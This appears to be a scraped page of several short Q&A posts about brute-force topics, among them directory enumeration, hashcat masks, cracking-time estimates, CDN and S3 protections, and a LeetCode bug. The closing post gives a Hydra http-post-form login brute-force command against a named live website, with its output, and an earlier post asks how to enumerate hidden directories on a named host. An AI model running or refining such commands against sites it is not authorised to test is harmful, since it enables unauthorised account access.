brute force – Bruteforcing URL to find directory

so imagine i have this URL: https://media.st.dl.pinyuncloud.com/apps/xyz/images/abc/ – It exists and result back error 403, which means it exists but I cannot access due to no previelege.

I want to bruteforce and find all the directories like ‘abc’ which exists but we cannot access like using any wordlist.

Can you recommend me the most efficient way to do this?

python – Two sum brute force – works on Jupiter but not on LeetCode

num = (3,6,11,15)
target = 9

def twosum(numlist, target):
    for i in range(len(numlist)-1):
        for j in range(i+1, len(numlist)):
            if numlist(i)+numlist(j)==target:
                print(numlist(i),numlist(j))
    return None

print(twosum(num,target))

I got a runtime error, which I did not have any problem running on Jupiter… I need some enlightenment!

NameError: name 'Solution' is not defined
    ret = Solution().twoSum(param_1, param_2)
Line 35 in _driver (Solution.py)
    _driver()
Line 46 in <module> (Solution.py)

brute force – Specifying wordsets in variables within hashcat masks/rules?

Hashcat documentation shows the following variables that we can use inside masks:

?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@()^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff

We can even create custom charsets (abc1234XYZ…) However, I wonder whether there is a way to do similar thing with wordsets (word1,word2,…)

?set1 = word1,word2,word3,... 

brute force – Hacking attemps from unkown source

These requests are coming from your private network, not from the public internet.

172.20.76.173 is part of the 172.16.0.0/12 subnet, which is dedicated for private networks. See https://en.wikipedia.org/wiki/Private_network for more info.

Is it possible that the security policy that you created is only applied to the public interface, and not the private interface?

brute force – Dictionary Attack Calculation

If I have a dictionary of passwords and have gained knowledge of usernames of a target site, how long will it take me to check all the passwords against the usernames if I have a computer that can test 1 billion combinations a second?

What formula should I use? Say I have 1 million dictionary passwords and know 500 000 usernames.

brute force – If and how security-oriented CDNs protect from BFAs?

I understand how some CDNs also suffice protection from DDoS attacks by distributing content serving via various machines instead just one machine so that distributed attacks on one machine become unfeasible.

If I am not mistaken, such CDNs can also help protect against brute force attacks and if so it might be good for me because I am currently having some trouble setting rate limiting due to some shared hosting AND content management system mismatches.

If and how security-oriented CDNs protect from BFAs?

untagged – Is the Amazon S3 Pre-Signed URL protected from brute force attack?

I want to know that whether Amazon S3 Pre-Signed URL is protected from brute force attack.

For example, if I am the only person who knows the Pre-signed URL, is it extremely unlikely that somebody use brute force attack and access to bucket?

brute force – Help with Hydra Bruteforce

I’m a beginner using Hydra brute force and entered here before to get some help that was successful.
In this case I’m attacking the website: https://hubbe.es

I don’t know why but my command is perfect and doesn’t work…
This is the view-source from the login page:

    <input type="text" class="input" placeholder="Usuario" name="username">
</div>
    <div class="input_box pass">
    <input type="password" class="input" placeholder="Contraseña" name="password">
    <input type="submit" value="Entrar" class="login-btn" name="login"> 

And this is the command that I’m using to attack the page: (Used the network tab from chrome to make it + the view-source of the page)

hydra -l Lucki -P PASSS.txt -vV -s 80 -f hubbe.es http-post-form "/index.php:username=^USER^&password=^PASS^&login=Entrar:F=¡Tu contraseña no es correcta!" 

Basically when I use the command this is the result:

Hydra (http://www.thc.org/thc-hydra) starting at 2021-01-03 14:05:53
(WARNING) Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
(DATA) max 5 tasks per 1 server, overall 64 tasks, 5 login tries (l:1/p:5), ~0 tries per task
(DATA) attacking service http-post-form on port 80
(VERBOSE) Resolving addresses ... done
(ATTEMPT) target hubbe.es - login "Lucki" - pass "mamaguebaso" - 1 of 5 (child 0)
(ATTEMPT) target hubbe.es - login "Lucki" - pass "singamalo" - 2 of 5 (child 1)
(ATTEMPT) target hubbe.es - login "Lucki" - pass "culoculo9" - 3 of 5 (child 2)
(ATTEMPT) target hubbe.es - login "Lucki" - pass "lolmen32" - 4 of 5 (child 3)
(ATTEMPT) target hubbe.es - login "Lucki" - pass "sdfdfsad" - 5 of 5 (child 4)
(VERBOSE) Page redirected to http://hubbe.es/index.ph
(VERBOSE) Page redirected to http://hubbe.es/index.ph
(VERBOSE) Page redirected to http://hubbe.es/index.ph
(VERBOSE) Page redirected to http://hubbe.es/index.ph
(VERBOSE) Page redirected to http://hubbe.es/index.ph
(VERBOSE) Page redirected to http://hubbe.es/index.p
(VERBOSE) Page redirected to http://hubbe.es/index.p
(VERBOSE) Page redirected to http://hubbe.es/index.p
(VERBOSE) Page redirected to http://hubbe.es/index.p
(VERBOSE) Page redirected to http://hubbe.es/index.p
(VERBOSE) Page redirected to http://hubbe.es/index.
(VERBOSE) Page redirected to http://hubbe.es/index.
(VERBOSE) Page redirected to http://hubbe.es/index.
(VERBOSE) Page redirected to http://hubbe.es/index.
(VERBOSE) Page redirected to http://hubbe.es/index.
(VERBOSE) Page redirected to http://hubbe.es/index
hubbe.es/index redirected to http://
(VERBOSE) Page redirected to http://hubbe.es/index
(VERBOSE) Page redirected to http://hubbe.es/index
hubbe.es/index redirected to http://
(VERBOSE) Page redirected to http://hubbe.es/inde
(VERBOSE) Page redirected to http://hubbe.es/inde
(VERBOSE) Page redirected to http://hubbe.es/inde
(VERBOSE) Page redirected to http://hubbe.es/inde
(VERBOSE) Page redirected to http://hubbe.es/inde
(VERBOSE) Page redirected to http://hubbe.es/ind
(VERBOSE) Page redirected to http://hubbe.es/ind
(VERBOSE) Page redirected to http://hubbe.es/ind
(VERBOSE) Page redirected to http://hubbe.es/ind
(VERBOSE) Page redirected to http://hubbe.es/ind
(VERBOSE) Page redirected to http://hubbe.es/in
(VERBOSE) Page redirected to http://hubbe.es/in
(VERBOSE) Page redirected to http://hubbe.es/in
(VERBOSE) Page redirected to http://hubbe.es/in
(VERBOSE) Page redirected to http://hubbe.es/in
(VERBOSE) Page redirected to http://hubbe.es/i
hubbe.es/iPage redirected to http://
(VERBOSE) Page redirected to http://hubbe.es/i
hubbe.es/iPage redirected to http://
hubbe.es/iPage redirected to http://
(STATUS) attack finished for hubbe.es (waiting for children to complete tests)
1 of 1 target completed, 0 valid passwords found 

The username that I’m attacking is mine and the password is on the litte .txt file that I’m using. Evidently I’m just testing to find a command that works on this page. If somebody can help me with this it would be great.

I also tried with this command:

hydra -l Lucki -P PASSS.txt -vV -s 80 -f hubbe.es http-post-form "/index.php:username=^USER^&password=^PASS^&login=Entrar:S=me"

But the hydra just “found a correct password” when it isn’t…